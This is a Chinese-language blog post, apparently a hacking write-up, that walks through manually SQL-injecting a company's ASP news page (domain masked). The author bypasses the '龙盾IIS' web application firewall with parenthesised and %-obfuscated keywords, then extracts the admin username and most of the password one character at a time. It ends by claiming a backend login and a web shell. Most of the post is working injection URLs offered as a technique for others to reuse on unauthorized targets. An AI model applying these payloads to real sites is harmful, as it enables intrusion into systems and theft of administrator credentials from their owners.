今天的技术主要是结合网上的和自己的想法思路绕过”龙盾IIS防火墙“其他防火墙没试过

好的废话不多说实战开始,

手工注入,工具是不行啦,

第一咱先判断是否有注入点

http://***.com/newsShow.asp?ArticleID=120 ’

http://***.com/newsShow.asp?ArticleID=120 and 1=1

http://***.com/newsShow.asp?ArticleID=120 and 1=2

一直提示 “龙盾IIS防火墙”提示:请不要提交非法信息或恶意访问

我想这个大家应该都不陌生,现在国内用这个的防火墙还挺多的,我看网上资料也比较少呵呵

自己研究了一下

成功突破~

http://***.com/newsShow.asp?ArticleID=(120)%20and%20(%201=1%20) 返回正常

http://***.com/newsShow.asp?ArticleID=(120)%20and%20(%201=2%20) 返回错误

呵呵,看来已经成功突破防火墙的限制啦~哈哈~

继续踩解吧~

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct * from admin)

呵呵返回成功,存在admin表,应该是个access的~是一个公司网站,估计也是access的呵呵

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct username from admin)

呵呵返回成功,存在username表

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct password from admin)

呵呵返回成功,存在password表

继续往下踩解吧~走吧,

http://***.com/newsShow.asp?ArticleID=(120) order by 1

http://***.com/newsShow.asp?ArticleID=(120) order by 1 order by 1

一直返回错误 看来 order 是用不了了,没办法 只有一个一个的去踩解啦~

先看看管理员用户名有几位吧~

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists(sele%%%ct username from admin where len(username)=5)

一切正常呵呵,不错 RP挺好~

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,1))=120)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,2))=50)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,3))=99)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,4))=51)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,5))=109)

账号都出来了, 用计算器转化了下

帐号就是:x2c3m

后面猜解密码~~

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists(sele%%%ct password from admin where len(password)=8) 密码一共有8位数

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,1))=98)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,2))=105)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,3))=111)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,4))=115)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,5))=108)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,6))=111)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,7))=97)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,8))=100)

密码:b***ad

直接去后台登陆,成功搞定,shell比较简单就不做介绍啦~~

现在的防火墙越来越多,希望与大家多多交流绕过防火墙的技术,有高人有好的方法请留贴….

转载文章请注明,转载自:小马's Blog https://www.i0day.com

本文链接: https://www.i0day.com/230.html